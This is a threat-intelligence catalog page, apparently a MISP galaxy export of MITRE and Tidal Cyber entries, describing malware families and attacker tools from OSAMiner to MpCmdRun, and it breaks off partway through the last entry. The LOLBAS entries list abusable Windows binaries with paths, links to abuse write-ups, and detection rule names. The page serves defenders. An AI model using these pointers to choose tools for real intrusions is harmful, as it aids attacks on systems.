macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[SentinelLabs reversing run-only applescripts 2021][VMRay OSAMiner dynamic analysis 2021]

Internal MISP references

UUID 74feb557-21bc-40fb-8ab5-45d3af84c380 which can be used as unique global reference for macOS.OSAMiner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S1048
source MITRE
type ['malware']

MacSpy

MacSpy is a malware-as-a-service offered on the darkweb [objsee mac malware 2017].

Internal MISP references

UUID e5e67c67-e658-45b5-850b-044312be4258 which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0282
source MITRE
type ['malware']

Mafalda

Mafalda is a flexible interactive implant that has been used by Metador. Security researchers assess the Mafalda name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. [SentinelLabs Metador Sept 2022]

Internal MISP references

UUID 7506616c-b808-54fb-9982-072a0dcf8a04 which can be used as unique global reference for Mafalda in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1060
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

MailSniper

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.[GitHub MailSniper]

Internal MISP references

UUID d762974a-ca7e-45ee-bc1d-f5218bf46c84 which can be used as unique global reference for MailSniper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Office 365', 'Windows', 'Azure AD']
software_attack_id S0413
source MITRE
tags ['15f2277a-a17e-4d85-8acd-480bf84f16b4', 'c9c73000-30a5-4a16-8c8b-79169f9c24aa']
type ['tool']
Related clusters

To see the related clusters, click here.

Makecab

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary to package existing files into a cabinet (.cab) file

Author: Oddvar Moe

Paths:
* C:\Windows\System32\makecab.exe
* C:\Windows\SysWOW64\makecab.exe

Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Detection:
* Sigma: proc_creation_win_susp_alternate_data_streams.yml
* Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml
* IOC: Makecab retrieving files from the Internet
* IOC: Makecab storing data into alternate data streams[Makecab.exe - LOLBAS Project]

Internal MISP references

UUID cf7f05a7-4093-4855-b9d9-b93226056aec which can be used as unique global reference for Makecab in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5123
source Tidal Cyber
tags ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Manage-bde

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Script for managing BitLocker

Author: Oddvar Moe

Paths:
* C:\Windows\System32\manage-bde.wsf

Resources:
* https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
* https://twitter.com/bohops/status/980659399495741441
* https://twitter.com/JohnLaTwC/status/1223292479270600706

Detection:
* Sigma: proc_creation_win_lolbin_manage_bde.yml
* IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations[Manage-bde.wsf - LOLBAS Project]

Internal MISP references

UUID 9b6b705e-55ae-4d9e-9c57-baf1358cc324 which can be used as unique global reference for Manage-bde in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5259
source Tidal Cyber
tags ['ff10869f-fed4-4f21-b83a-9939e7381d6e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

MarkiRAT

MarkiRAT is a remote access Trojan (RAT) compiled with Visual Studio that has been used by Ferocious Kitten since at least 2015.[Kaspersky Ferocious Kitten Jun 2021]

Internal MISP references

UUID 40806539-1496-4a64-b740-66f6a1467f40 which can be used as unique global reference for MarkiRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0652
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']
Related clusters

To see the related clusters, click here.

MASSCAN

According to its GitHub project page, MASSCAN is an "Internet-scale" TCP port scanner. Its usage is similar to that of the popular nmap scanning tool, but it is designed to be operated at a larger scale.[GitHub masscan]

Internal MISP references

UUID 24862f72-a4e0-4a6b-90d7-2465aa86c402 which can be used as unique global reference for MASSCAN in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5282
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Matryoshka

Matryoshka is a malware framework used by CopyKittens that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. [ClearSky Wilted Tulip July 2017] [CopyKittens Nov 2015]

Internal MISP references

UUID eeb700ea-2819-46f4-936d-f7592f20dedc which can be used as unique global reference for Matryoshka in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0167
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Mavinject

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by App-v in Windows

Author: Oddvar Moe

Paths:
* C:\Windows\System32\mavinject.exe
* C:\Windows\SysWOW64\mavinject.exe

Resources:
* https://twitter.com/gN3mes1s/status/941315826107510784
* https://twitter.com/Hexcorn/status/776122138063409152
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Detection:
* Sigma: proc_creation_win_lolbin_mavinject_process_injection.yml
* IOC: mavinject.exe should not run unless App-V is in use on the workstation[LOLBAS Mavinject]

Internal MISP references

UUID aa472f81-7673-4545-89f9-1dd43cead4f1 which can be used as unique global reference for Mavinject in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5124
source Tidal Cyber
tags ['724c3509-ad5e-46a3-a72c-6f3807b13793', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Maze

Maze ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, Maze operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.[FireEye Maze May 2020][McAfee Maze March 2020][Sophos Maze VM September 2020]

Internal MISP references

UUID 3c206491-45c0-4ff7-9f40-45f9aae4de64 which can be used as unique global reference for Maze in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0449
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '1cc90752-70a3-4a17-b370-e1473a212f79', '286918d5-0b48-4655-9118-907b53de0ee0', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

MCMD

MCMD is a remote access tool, used by Dragonfly 2.0, that provides a remote command shell capability.[Secureworks MCMD July 2019]

Internal MISP references

UUID 939cbe39-5b63-4651-b0c0-85ac39cb9f0e which can be used as unique global reference for MCMD in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0500
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

MechaFlounder

MechaFlounder is a Python-based remote access tool (RAT) that has been used by APT39. The payload combines actor-developed code with code snippets freely available online in development communities.[Unit 42 MechaFlounder March 2019]

Internal MISP references

UUID 31cbe3c8-be88-4a4f-891d-04c3bb7ed482 which can be used as unique global reference for MechaFlounder in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0459
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

MedusaLocker Ransomware

MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 it has typically occurred via exploitation of vulnerable Remote Desktop Protocol (RDP) devices.[HC3 Analyst Note MedusaLocker Ransomware February 2023]

Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/medusalocker/

Internal MISP references

UUID c9e824b2-554b-4f42-b4c3-48e0a841f589 which can be used as unique global reference for MedusaLocker Ransomware in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5022
source Tidal Cyber
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

meek

meek is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

Internal MISP references

UUID 6c3bbcae-3217-43c7-b709-5c54bc7636b1 which can be used as unique global reference for meek in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0175
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['tool']
Related clusters

To see the related clusters, click here.

MegaCortex

MegaCortex is ransomware that first appeared in May 2019. [IBM MegaCortex] MegaCortex has mainly targeted industrial organizations. [FireEye Ransomware Disrupt Industrial Production][FireEye Financial Actors Moving into OT]

Internal MISP references

UUID d8a4a817-2914-47b0-867c-ad8eeb7efd10 which can be used as unique global reference for MegaCortex in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0576
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

MEGAsync

MEGAsync is a legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.[GitHub meganz MEGAsync] Adversaries are known to abuse the tool for data exfiltration purposes.[U.S. CISA BianLian Ransomware May 2023]

Internal MISP references

UUID eed908e5-a0b3-473f-bca4-0d3197af2168 which can be used as unique global reference for MEGAsync in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5005
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Melcoz

Melcoz is a banking trojan family built from the open source tool Remote Access PC. Melcoz was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.[Securelist Brazilian Banking Malware July 2020]

Internal MISP references

UUID aa844e6b-feda-4928-8c6d-c59f7be88da0 which can be used as unique global reference for Melcoz in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0530
source MITRE
type ['malware']

MESSAGETAP

MESSAGETAP is a data mining malware family deployed by APT41 into telecommunications networks to monitor and save SMS traffic that comes from specific phone numbers or IMSI numbers, or that contains specific keywords. [FireEye MESSAGETAP October 2019]

Internal MISP references

UUID 15d7e478-349d-42e6-802d-f16302b98319 which can be used as unique global reference for MESSAGETAP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0443
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

metaMain

metaMain is a backdoor used by Metador to maintain long-term access to compromised machines; it has also been used to decrypt Mafalda into memory.[SentinelLabs Metador Sept 2022][SentinelLabs Metador Technical Appendix Sept 2022]

Internal MISP references

UUID 0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d which can be used as unique global reference for metaMain in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1059
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Metamorfo

Metamorfo is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.[Medium Metamorfo Apr 2020][ESET Casbaneiro Oct 2019]

Internal MISP references

UUID ca607087-25ad-4a91-af83-608646cccbcb which can be used as unique global reference for Metamorfo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0455
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

Metasploit

The Metasploit Framework is an open-source software project that aids in penetration testing.[Metasploit_Ref] The software is often abused by malicious actors to perform a range of post-exploitation activities.

Internal MISP references

UUID 8d3b1150-8bb3-49a8-8266-7023e3c5e50a which can be used as unique global reference for Metasploit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Linux', 'macOS', 'Windows']
software_attack_id S5050
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['malware']
Related clusters

To see the related clusters, click here.

Meteor

Meteor is a wiper that was used against Iranian government organizations, including Iranian Railways and Ministry of Roads and Urban Development systems, in July 2021. Meteor is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.[Check Point Meteor Aug 2021]

Internal MISP references

UUID ee07030e-ff50-404b-ad27-ab999fc1a23a which can be used as unique global reference for Meteor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0688
source MITRE
type ['malware']

Mftrace

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Trace log generation tool for Media Foundation Tools.

Author: Oddvar Moe

Paths:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
* C:\Program Files (x86)\Windows Kits\10\bin\x86
* C:\Program Files (x86)\Windows Kits\10\bin\x64

Resources:
* https://twitter.com/0rbz_/status/988911181422186496

Detection:
* Sigma: proc_creation_win_lolbin_mftrace.yml[Mftrace.exe - LOLBAS Project]

Internal MISP references

UUID 4184f447-6f74-487b-be08-6330a6b78992 which can be used as unique global reference for Mftrace in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5224
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Micropsia

Micropsia is a remote access tool written in Delphi.[Talos Micropsia June 2017][Radware Micropsia July 2018]

Internal MISP references

UUID 5879efc1-f122-43ec-a80d-e25aa449594d which can be used as unique global reference for Micropsia in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0339
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']

Microsoft.NodejsTools.PressAnyKey

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Part of the NodeJS Visual Studio tools.

Author: mr.d0x

Paths:
* C:\Program Files\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
* C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe

Resources:
* https://twitter.com/mrd0x/status/1463526834918854661

Detection:
* Sigma: proc_creation_win_renamed_pressanykey.yml
* Sigma: proc_creation_win_pressanykey_lolbin_execution.yml[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project]

Internal MISP references

UUID 370b00ba-1f91-4375-8a4c-5ca67066f4fd which can be used as unique global reference for Microsoft.NodejsTools.PressAnyKey in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5225
source Tidal Cyber
tags ['eb75bfce-e0d6-41b3-a3f0-df34e6e9b476', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Microsoft.Workflow.Compiler

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.

Author: Conor Richard

Paths:
* C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe

Resources:
* https://twitter.com/mattifestation/status/1030445200475185154
* https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
* https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1
* https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1
* https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks
* https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/
* https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

Detection:
* Sigma: proc_creation_win_lolbin_workflow_compiler.yml
* Splunk: suspicious_microsoft_workflow_compiler_usage.yml
* Splunk: suspicious_microsoft_workflow_compiler_rename.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
* IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
* IOC: Presence of "<CompilerInput" in a text file.[Microsoft.Workflow.Compiler.exe - LOLBAS Project]

Internal MISP references

UUID 27bd5fc3-17d9-46fa-84ce-c772736512cd which can be used as unique global reference for Microsoft.Workflow.Compiler in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5125
source Tidal Cyber
tags ['b48e3fa8-25b4-42be-97e7-086068a150c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Milan

Milan is a backdoor implant based on DanBot that was written in Visual C++ and .NET. Milan has been used by HEXANE since at least June 2020.[ClearSky Siamesekitten August 2021][Kaspersky Lyceum October 2021]

Internal MISP references

UUID 57545dbc-c72a-409d-a373-bc35e25160cd which can be used as unique global reference for Milan in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1015
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Mimikatz

Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [Deply Mimikatz] [Adsecurity Mimikatz Guide]

Internal MISP references

UUID b8e7c0b4-49e4-4e8d-9467-b17f305ddf16 which can be used as unique global reference for Mimikatz in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0002
source MITRE
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '5fda51b0-dfda-49bd-8615-524b45d4cd44', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

MimiPenguin

MimiPenguin is a credential dumper, similar to Mimikatz, designed specifically for Linux platforms. [MimiPenguin GitHub May 2017]

Internal MISP references

UUID 42350632-b59a-4cc5-995e-d95d8c608553 which can be used as unique global reference for MimiPenguin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0179
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['tool']
Related clusters

To see the related clusters, click here.

Miner-C

Miner-C is malware that uses victims' machines to mine the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. [Softpedia MinerC]

Internal MISP references

UUID c0dea9db-1551-4f6c-8a19-182efc34093a which can be used as unique global reference for Miner-C in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0133
source MITRE
type ['malware']

MiniDuke

MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke. [F-Secure The Dukes]

Internal MISP references

UUID 2bb16809-6bc3-46c3-b28a-39cb49410340 which can be used as unique global reference for MiniDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0051
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

MirageFox

MirageFox is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. [APT15 Intezer June 2018]

Internal MISP references

UUID 535f1b97-7a70-4d18-be4e-3a9f74ccf78a which can be used as unique global reference for MirageFox in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0280
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Misdat

Misdat is a backdoor that was used in Operation Dust Storm from 2010 to 2011.[Cylance Dust Storm]

Internal MISP references

UUID 4048afa2-79c8-4d38-8219-2207adddd884 which can be used as unique global reference for Misdat in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0083
source MITRE
type ['malware']

Mis-Type

Mis-Type is a backdoor hybrid that was used in Operation Dust Storm by 2012.[Cylance Dust Storm]

Internal MISP references

UUID fe554d2e-f974-41d6-8e7a-701bd758355d which can be used as unique global reference for Mis-Type in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0084
source MITRE
type ['malware']

Mivast

Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach. [Symantec Black Vine]

Internal MISP references

UUID f603ea32-91c3-4b62-a60f-57670433b080 which can be used as unique global reference for Mivast in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0080
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Mmc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Load snap-ins to locally and remotely manage Windows systems

Author: @bohops

Paths:
* C:\Windows\System32\mmc.exe
* C:\Windows\SysWOW64\mmc.exe

Resources:
* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
* https://offsec.almond.consulting/UAC-bypass-dotnet.html

Detection:
* Sigma: proc_creation_win_mmc_susp_child_process.yml
* Sigma: file_event_win_uac_bypass_dotnet_profiler.yml[Mmc.exe - LOLBAS Project]

Internal MISP references

UUID 8c7acae2-f844-4e01-86d8-18c3ea90963f which can be used as unique global reference for Mmc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5126
source Tidal Cyber
tags ['f9e6382f-e41e-438e-bd7e-57a57046d9e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

MobileOrder

MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]

Internal MISP references

UUID 116f913c-0d5e-43d1-ba0d-3a12127af8f6 which can be used as unique global reference for MobileOrder in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0079
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

MoleNet

MoleNet is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.[Cybereason Molerats Dec 2020]

Internal MISP references

UUID 7ca5debb-f813-4e06-98f8-d1186552e5d2 which can be used as unique global reference for MoleNet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0553
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Mongall

Mongall is a backdoor that has been used since at least 2013, including by Aoqin Dragon.[SentinelOne Aoqin Dragon June 2022]

Internal MISP references

UUID 7f5355b3-e819-4c82-a0fa-b80fda8fd6e6 which can be used as unique global reference for Mongall in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1026
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

MoonWind

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. [Palo Alto MoonWind March 2017]

Internal MISP references

UUID a699f32f-6596-4060-8fcd-42587a844b80 which can be used as unique global reference for MoonWind in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0149
source MITRE
type ['malware']

More_eggs

More_eggs is a JScript backdoor used by Cobalt Group and FIN6. It is named after the variable "More_eggs" present in its code. At least two different versions of the backdoor are in use, version 2.0 and version 4.4. [Talos Cobalt Group July 2018][Security Intelligence More Eggs Aug 2019]

Internal MISP references

UUID 69f202e7-4bc9-4f4f-943f-330c053ae977 which can be used as unique global reference for More_eggs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0284
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Mori

Mori is a backdoor that has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]

Internal MISP references

UUID 385e1eaf-9ba8-4381-981a-3c7af718a77d which can be used as unique global reference for Mori in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1047
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Mosquito

Mosquito is a Win32 backdoor that has been used by Turla. Mosquito is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. [ESET Turla Mosquito Jan 2018]

Internal MISP references

UUID c3939dad-d728-4ddb-804e-cf1e3743a55d which can be used as unique global reference for Mosquito in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0256
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

MpCmdRun

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary part of Windows Defender. Used to manage settings in Windows Defender

Author: Oddvar Moe

